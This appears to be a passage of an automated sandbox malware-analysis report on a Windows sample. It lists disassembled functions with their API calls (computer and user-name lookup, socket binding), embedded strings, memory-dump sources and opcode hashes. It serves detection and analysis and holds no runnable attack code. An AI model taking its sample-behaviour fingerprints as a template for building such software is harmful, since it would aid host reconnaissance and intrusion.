                            • String ID:
                            • API String ID: 3890610498-0
                            • Opcode ID: ad209a522ce5a102365635a8d2a9c0ab8a9610261a2056c889f7d081ebeb0a76
                            • Instruction ID: 5ef1c91e3d7a23d27ffad0caffddf353d30ea94ee27d0fbe51ee90fa746b6dfd
                            • Opcode Fuzzy Hash: ad209a522ce5a102365635a8d2a9c0ab8a9610261a2056c889f7d081ebeb0a76
                            • Instruction Fuzzy Hash: 4D118E7190061AEFD710CF65D884BAEFBB8FF55725F10422AE91497250D3B0AA55CFE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prologStartupgethostbynameinet_ntoa
                            • String ID:
                            • API String ID: 3789426293-0
                            • Opcode ID: f9bbe8c004ec359deb926b868d3b580d4f11b5644436f6f8a6ffa73d4713af27
                            • Instruction ID: d8f70ffa042a331975101c60f6318a458026d59f382951e2fe8e46417805bd2a
                            • Opcode Fuzzy Hash: f9bbe8c004ec359deb926b868d3b580d4f11b5644436f6f8a6ffa73d4713af27
                            • Instruction Fuzzy Hash: DF115E71E012089FCB10DFA9D889AEDBBF9FF49310F0080ABE505D3250D7744A058B95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00414FCA
                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,?), ref: 00414FE6
                            • EnterCriticalSection.KERNEL32(?), ref: 00414FF8
                            • LeaveCriticalSection.KERNEL32(?,?), ref: 0041501A
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$CompletionEnterH_prologLeavePostQueuedStatus
                            • String ID:
                            • API String ID: 3890610498-0
                            • Opcode ID: 795c4aaf7302f1d8da56c00ef435025cb7637fe8cdecffaf110e4b1caab2fa0b
                            • Instruction ID: e4ccac70859e7255c06649105df93775297bbe88067fbb39c88871d14b751ec6
                            • Opcode Fuzzy Hash: 795c4aaf7302f1d8da56c00ef435025cb7637fe8cdecffaf110e4b1caab2fa0b
                            • Instruction Fuzzy Hash: B8018B72500609EFDB04DFA4DD84BEABBB9FF48325F00012AF60596590C7B09E55CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 0044DB7B: __EH_prolog.LIBCMT ref: 0044DB80
                              • Part of subcall function 0044DB7B: GetTickCount64.KERNEL32 ref: 0044DBA6
                            • __aulldiv.LIBCMT ref: 00417605
                              • Part of subcall function 0041CE76: __EH_prolog.LIBCMT ref: 0041CE7B
                              • Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8
                              • Part of subcall function 0041CECB: __Thrd_sleep.LIBCPMT ref: 0041CF5E
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$Count64DeallocateThrd_sleepTick__aulldivstd::_
                            • String ID: E$z
                            • API String ID: 2474810027-3358126013
                            • Opcode ID: 588cd007f047332b7308b3dae4ef1a833568404c7f8d1eb4b78510cc390f5c74
                            • Instruction ID: 2eaba0ccaa686da508d11499954a1da9c3e741317afdc22d313da4b1b5c9f64b
                            • Opcode Fuzzy Hash: 588cd007f047332b7308b3dae4ef1a833568404c7f8d1eb4b78510cc390f5c74
                            • Instruction Fuzzy Hash: 30E1067080528CDADB11EB64DD45BEEBBB89F52308F2080EEE04577192EB781F84DB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004337C3
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 004337CE
                              • Part of subcall function 0044DB7B: __EH_prolog.LIBCMT ref: 0044DB80
                              • Part of subcall function 0044DB7B: GetTickCount64.KERNEL32 ref: 0044DBA6
                              • Part of subcall function 004530A5: __EH_prolog.LIBCMT ref: 004530AA
                              • Part of subcall function 004607D1: __EH_prolog.LIBCMT ref: 004607D6
                              • Part of subcall function 004607D1: GetComputerNameW.KERNEL32 ref: 0046080D
                              • Part of subcall function 00471490: __EH_prolog.LIBCMT ref: 00471495
                              • Part of subcall function 00471490: GetUserNameW.ADVAPI32(00000000,?), ref: 004714E1
                              • Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8
                              • Part of subcall function 0041CECB: __Thrd_sleep.LIBCPMT ref: 0041CF5E
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$Name$ComputerCount64DeallocateExceptionException@8RaiseThrd_sleepThrowTickUserstd::_
                            • String ID: Z
                            • API String ID: 67087267-1505515367
                            • Opcode ID: 6936b5b5cff2bf5511142529167f0f0c6787c392f27623eb3d1bd6948fc9669b
                            • Instruction ID: e75bd0fc9609dba1d425c70c7c75589d46f10d8bf46f197f3992a8929ad6dd56
                            • Opcode Fuzzy Hash: 6936b5b5cff2bf5511142529167f0f0c6787c392f27623eb3d1bd6948fc9669b
                            • Instruction Fuzzy Hash: E1C1D670C05298EEDB11EB64DD85BDDBBB89F56308F1040EEE04577192DA781F84CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 005CEB37
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 005CECED
                              • Part of subcall function 005CED90: CreateDirectoryExW.KERNEL32(?,?,00000000,?,00435880,005CED1C,?,00000000,00435880,?), ref: 005CEDD3
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Exception@8Throw$CreateDirectory
                            • String ID: boost::filesystem::create_directories
                            • API String ID: 2901307233-2171239142
                            • Opcode ID: 82fe8898462eabbab5a3bd5137425dea576a5c3d04c8123f9ad834508d30b31a
                            • Instruction ID: 6f7992f25592b5bb747cf72b30758f9e2d9695e2689a35dec5efe62210ded7d9
                            • Opcode Fuzzy Hash: 82fe8898462eabbab5a3bd5137425dea576a5c3d04c8123f9ad834508d30b31a
                            • Instruction Fuzzy Hash: B6919E70D002199ECF20DBE4C886FEEBBB8BF55314F14456EE406A7241EB75AE49CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00436644
                              • Part of subcall function 00460981: __EH_prolog.LIBCMT ref: 00460986
                              • Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8
                              • Part of subcall function 004734EE: __EH_prolog.LIBCMT ref: 004734F3
                              • Part of subcall function 004AB703: std::_Deallocate.LIBCONCRT ref: 004AB733
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$Deallocatestd::_
                            • String ID: 1.38$T
                            • API String ID: 89631465-1427993570
                            • Opcode ID: e750e5d3ca9c7100f2eae44ee9897e8e6b4560916c3e700f10bf579972159d78
                            • Instruction ID: 6e48d48c6e03148c8822514970cb7de93f123c4316aff54180176b026ae7daa5
                            • Opcode Fuzzy Hash: e750e5d3ca9c7100f2eae44ee9897e8e6b4560916c3e700f10bf579972159d78
                            • Instruction Fuzzy Hash: DB810971C0528CE9DB11DBA8DD81BDDBBB89F66308F20419EE04577192DB741F48CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 0044F6CC
                              • Part of subcall function 004AB703: std::_Deallocate.LIBCONCRT ref: 004AB733
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeallocateH_prologstd::_
                            • String ID: G$p
                            • API String ID: 3881773970-729404109
                            • Opcode ID: 94d77107c1bbdcd6190ee5f349cefed6046417644a9bd7f3502c232771c29889
                            • Instruction ID: 40a51d229db9341d0e7df531c53e4d1e5e657513680bd561c8e3345f316e5f19
                            • Opcode Fuzzy Hash: 94d77107c1bbdcd6190ee5f349cefed6046417644a9bd7f3502c232771c29889
                            • Instruction Fuzzy Hash: 7A71D671C05288EAEB10DBE9D9457DDBFB8AF55304F1040AEE045A7182DB781B48CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00434D58
                              • Part of subcall function 00461060: __EH_prolog.LIBCMT ref: 00461065
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID: "vY$wAg
                            • API String ID: 3519838083-1768716462
                            • Opcode ID: 2dec73764483e5abc5bc0378460c8e1a0de0bdf06f224f8983232b209a30d000
                            • Instruction ID: 2fa68a94fd0d32a5c8376383fa7a0e4f225435e4e624bbceb963ee89a754a304
                            • Opcode Fuzzy Hash: 2dec73764483e5abc5bc0378460c8e1a0de0bdf06f224f8983232b209a30d000
                            • Instruction Fuzzy Hash: 5871AE70C04248EEEF10DFA9D985BDEBBB9EF95304F10409EE045A7252DBB86A44CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: crypto\async\async.c
                            • API String ID: 0-1899283870
                            • Opcode ID: 39b47971c08dc4f6c7a5e15d589044e6103f360b1e8e4be50bd84a01db1e8ca4
                            • Instruction ID: da3c53c4a4a0aebb8a8b2fc7cab16ca0a612ea9429f93283b614a609741fc94c
                            • Opcode Fuzzy Hash: 39b47971c08dc4f6c7a5e15d589044e6103f360b1e8e4be50bd84a01db1e8ca4
                            • Instruction Fuzzy Hash: 66411DB57807067AF63036556C4BF6B7F48BB90B56F240027FA88AC2C3FAD299508571
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00432DFD
                              • Part of subcall function 00415489: __EH_prolog.LIBCMT ref: 0041548E
                              • Part of subcall function 00415489: new.LIBCMT ref: 004154A0
                              • Part of subcall function 00415489: new.LIBCMT ref: 004154DE
                              • Part of subcall function 0041EE30: __EH_prolog.LIBCMT ref: 0041EE35
                              • Part of subcall function 0041037A: __EH_prolog.LIBCMT ref: 0041037F
                              • Part of subcall function 00452F81: __EH_prolog.LIBCMT ref: 00452F86
                              • Part of subcall function 00452F81: socket.WS2_32(00000002,00000002,00000000), ref: 00452FB4
                              • Part of subcall function 00416C3E: htons.WS2_32(?), ref: 00416C76
                              • Part of subcall function 00416C3E: htonl.WS2_32(00000000), ref: 00416C8D
                              • Part of subcall function 00416C3E: htonl.WS2_32(00000000), ref: 00416C94
                              • Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$htonl$Deallocatehtonssocketstd::_
                            • String ID: bind$open
                            • API String ID: 2957969969-2728503700
                            • Opcode ID: 24ee4f620a5cccde8f7c43e641fb2b716fa843550576fd8f63460b4becf80752
                            • Instruction ID: 4ca38705aeddfdfacb98326116f125cd93acbfa0a6ffbd9d5e20148db8a6d732
                            • Opcode Fuzzy Hash: 24ee4f620a5cccde8f7c43e641fb2b716fa843550576fd8f63460b4becf80752
                            • Instruction Fuzzy Hash: AE517E71C0529CEEDB11EBE5D991BEEBBB4AF14304F1080AFE105A7182DA741B88DB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004334B0
                              • Part of subcall function 004333A6: __EH_prolog.LIBCMT ref: 004333AB
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID: rY$'rY
                            • API String ID: 3519838083-1727070709
                            • Opcode ID: 46b618b54424aa12287b3cb71aa652064b017c339009dea8a79aeea476fad357
                            • Instruction ID: 692f344c23351cecb39725d4d3077dfbbdfcf21885d61712d72860f172fa44e3
                            • Opcode Fuzzy Hash: 46b618b54424aa12287b3cb71aa652064b017c339009dea8a79aeea476fad357
                            • Instruction Fuzzy Hash: 674129B5E00219AFCB14CFA9C8449AEBBF5BF8C751F24416EE409E7310DB359A41CB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004331CD
                              • Part of subcall function 004330E8: __EH_prolog.LIBCMT ref: 004330ED
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID: rY$'rY
                            • API String ID: 3519838083-1727070709
                            • Opcode ID: fb37b0818a0e19826a2187efdc4dcf1040dcd67f2b122291d9ba0d5725a1927b
                            • Instruction ID: 0f5e3793816f3bba2d34fd07c16d742ccfd9016c05c8c025a83938d6cef4e951
                            • Opcode Fuzzy Hash: fb37b0818a0e19826a2187efdc4dcf1040dcd67f2b122291d9ba0d5725a1927b
                            • Instruction Fuzzy Hash: 224108B5E022199FCB14CFA9C584AAEBBB4BF4CB11F10419AE905E7350C7359E41CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetLastError.KERNEL32(2D5DBC68,?,00000000,?), ref: 005CF637
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 005CF730
                            Strings
                            • boost::filesystem::status, xrefs: 005CF6E6
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorException@8LastThrow
                            • String ID: boost::filesystem::status
                            • API String ID: 1006195485-3746320807
                            • Opcode ID: e42739a45e596990b7cfc16a74c72c3356f572ff7a6c8eda62e78dd9af7f037f
                            • Instruction ID: 02e877792801fd1c8b06ca71dec80e0a00fba2e46346229c47f147163ae3cec5
                            • Opcode Fuzzy Hash: e42739a45e596990b7cfc16a74c72c3356f572ff7a6c8eda62e78dd9af7f037f
                            • Instruction Fuzzy Hash: AB418D719002199FCB24EF98C884BADBFB6FF45314F25813EE819AB261D7749C44CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID: Day of month is not valid for year$d
                            • API String ID: 3519838083-3980292007
                            • Opcode ID: f0d9c1bc68be35919035e67856b0244b9289362c3dc5eae8e337aafa6987f361
                            • Instruction ID: aa6edb0c93ecd5314a4e0f99c3c8531e0ddc2fcbff495adc8c709a8d16015b63
                            • Opcode Fuzzy Hash: f0d9c1bc68be35919035e67856b0244b9289362c3dc5eae8e337aafa6987f361
                            • Instruction Fuzzy Hash: 8E310872B402159AEB14CF79CD0A7FEB7A69B54314F06812BE504E72C4EA78CD44C2A4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004B755F
                              • Part of subcall function 004B4FA0: __EH_prolog.LIBCMT ref: 004B4FA5
                              • Part of subcall function 004B4FA0: new.LIBCMT ref: 004B4FF1
                              • Part of subcall function 004B503A: __EH_prolog.LIBCMT ref: 004B503F
                              • Part of subcall function 004B503A: __CxxThrowException@8.LIBVCRUNTIME ref: 004B50A1
                            Strings
                            • class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > __thiscall boost::property_tree::string_path<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct boost::property_tree::id_transla, xrefs: 004B767C
                            • Path syntax error, xrefs: 004B764E
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$Exception@8Throw
                            • String ID: Path syntax error$class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > __thiscall boost::property_tree::string_path<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct boost::property_tree::id_transla
                            • API String ID: 1007369359-3032971650
                            • Opcode ID: f189be5e101b9328370c96e4b9e25b85855082e6f39bc0c9d5a8a1199a76c993
                            • Instruction ID: 1fe75e96094b70f8ad0054a53985330ea68fc853070fa1b5f7cb6a6fcb7f7e63
                            • Opcode Fuzzy Hash: f189be5e101b9328370c96e4b9e25b85855082e6f39bc0c9d5a8a1199a76c993
                            • Instruction Fuzzy Hash: 42418A71904249EFDB04DFA9C984AEDFBB4FF40304F14412EE405A7292D778AE95CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 005D4310: ___std_exception_copy.LIBVCRUNTIME ref: 005D4362
                            • new.LIBCMT ref: 005D40E6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: ___std_exception_copy
                            • String ID: E]$LH]
                            • API String ID: 2659868963-3060650702
                            • Opcode ID: 77b1a5ef5243e7d6a76c58b63ee0674987db0f583cd877e34ef704fe3103e65e
                            • Instruction ID: bd9410c490ee1d573dee63c77907cfe87397a9c892b7ca0e80118e31d218f4e5
                            • Opcode Fuzzy Hash: 77b1a5ef5243e7d6a76c58b63ee0674987db0f583cd877e34ef704fe3103e65e
                            • Instruction Fuzzy Hash: C531CBB0A05309EFDB10DF68D845B59BBB4FF09724F10026EE8188B381E779E955CB96
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004224E2
                            • std::_Winerror_message.LIBCPMT ref: 0042252A
                              • Part of subcall function 00584505: FormatMessageW.KERNEL32(00001200,00000000,00000008,00000000,?,00000000,00000000,00000000,00000000,00000001,00007FFF,00000000,?,00007FFF,00007FFF,00000000), ref: 00584553
                              • Part of subcall function 00584505: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000), ref: 00584572
                              • Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$ByteCharDeallocateFormatH_prologMessageMultiWideWinerror_message
                            • String ID: unknown error
                            • API String ID: 2358782872-3078798498
                            • Opcode ID: 40108e59e6ac02bb2a38e014ec0744ac4b1191511605edb5e6e082be833864ff
                            • Instruction ID: 6108e8fbc585725bae20dc5b15ae57025f41918aac55a4ea7dc56692084daffb
                            • Opcode Fuzzy Hash: 40108e59e6ac02bb2a38e014ec0744ac4b1191511605edb5e6e082be833864ff
                            • Instruction Fuzzy Hash: 5B2159B2D0511DABCB00EF99D8919EEFFB8EF59354F44002EE505B7212D7746A88CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetFileAttributesExW.KERNEL32(?,00000000,00000001,00000001,00000001,?,?,00000001,00000000,00000001,00000000,00000000,?,?,?), ref: 005CF042
                            • GetLastError.KERNEL32(?,?,boost::filesystem::file_size,?,?), ref: 005CF053
                              • Part of subcall function 005D46A0: __CxxThrowException@8.LIBVCRUNTIME ref: 005D4749
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: AttributesErrorException@8FileLastThrow
                            • String ID: boost::filesystem::file_size
                            • API String ID: 1873943377-1937220381
                            • Opcode ID: db774dc388341c81d66171dc989d389095fd4218b21e0031342f63a9153e303d
                            • Instruction ID: eabdad901f33c0dc12b289c500b2f4331796d6d1a375e139be6d6f11c64f59c3
                            • Opcode Fuzzy Hash: db774dc388341c81d66171dc989d389095fd4218b21e0031342f63a9153e303d
                            • Instruction Fuzzy Hash: 9E112331A002005FD310AB39DC4AB2B7BD5BF89B30F944B1EF05A961C1D7B4D8008792
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            • %s:%d: error: (%d) %s, xrefs: 005268D8
                            • %s:%d: error: (%d) %s in function %s, xrefs: 005268A3
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID: %s:%d: error: (%d) %s$%s:%d: error: (%d) %s in function %s
                            • API String ID: 3519838083-3777411579
                            • Opcode ID: 1ab721cc91cfb73d5f889b76702c2d0e0eed41a2f65ad56f97a41821c80a4f43
                            • Instruction ID: 4ccea0192ace5affc3e80e56c8df7a7576fd484cde543b620d4a3d333096873b
                            • Opcode Fuzzy Hash: 1ab721cc91cfb73d5f889b76702c2d0e0eed41a2f65ad56f97a41821c80a4f43
                            • Instruction Fuzzy Hash: FD219F71800719EFEB18DF94D845AAABBF5FF06304F50095DE016575E2E7B2EA84CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            • invalid wchar_t filename argument, xrefs: 00423236
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prologTo_byte
                            • String ID: invalid wchar_t filename argument
                            • API String ID: 2823267341-1601001258
                            • Opcode ID: c0146faeb8b3e4e827e36a0904effebb77cdb405899f9dacd23ba4392d1765c2
                            • Instruction ID: f041f88476bd70d9e55b7f90aabdec7a9fba3aca7393ca4c5040615faeca2fb0
                            • Opcode Fuzzy Hash: c0146faeb8b3e4e827e36a0904effebb77cdb405899f9dacd23ba4392d1765c2
                            • Instruction Fuzzy Hash: B3118EB29042099ECB10EFA9D981AEEFBF8FF48314F10016FE504A7201DB745B84CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memcmp
                            • String ID: IsString()$rhs.IsString()
                            • API String ID: 2931989736-3903486248
                            • Opcode ID: 2bbd160786a96e9dabfdba009fb99b1734b9d4c065814c35736bc7994aaa9fe4
                            • Instruction ID: 0f701768cc556a09b3f67f8e49e637bb5103caae27dc64a973d385550b1ac489
                            • Opcode Fuzzy Hash: 2bbd160786a96e9dabfdba009fb99b1734b9d4c065814c35736bc7994aaa9fe4
                            • Instruction Fuzzy Hash: E401F762A0421172AD1036795C828BB738DCBE3B98B01003BF90597742E9AE8C0652BE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prologswprintf
                            • String ID: %02x
                            • API String ID: 723770199-560843007
                            • Opcode ID: e31e01e6f943849ffa86725ead3cabea827d92710ae4f086a1d1ae424f08c144
                            • Instruction ID: 96f198674f4598fe0da5d80f9c493f1924c04696cae716ec7ad006bd1d63d99c
                            • Opcode Fuzzy Hash: e31e01e6f943849ffa86725ead3cabea827d92710ae4f086a1d1ae424f08c144
                            • Instruction Fuzzy Hash: 8511D0B1D04258EBDB00EF99C581AFEFFB4FF04314F14046EE98567282C7B95A4487A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
